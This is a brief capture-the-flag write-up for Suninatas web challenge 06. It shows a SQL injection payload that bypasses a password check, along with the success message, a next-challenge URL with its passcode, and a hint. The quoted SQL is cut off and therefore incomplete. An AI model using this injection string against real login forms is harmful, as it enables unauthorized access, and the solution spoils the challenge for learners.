Suninatas Game 06
challenges
Game 06
Vulnerability: SQL Injection
Attack Vector
1 | select szPwd from T_Web13 where |
Inject with 1' or '1' like '1:
1 | select szPwd from T_Web13 where |
This bypasses the password check by making the condition always true.
Success Response
1 | Congratulation!! |
Next challenge URL:
http://suninatas.com/challenge/web06/view.asp?idx=3&num=3&passcode=wkdrnlwnd
Hint form:
1 | <form method="post" name="KEY_HINT" action="Rome's First Emperor"></form> |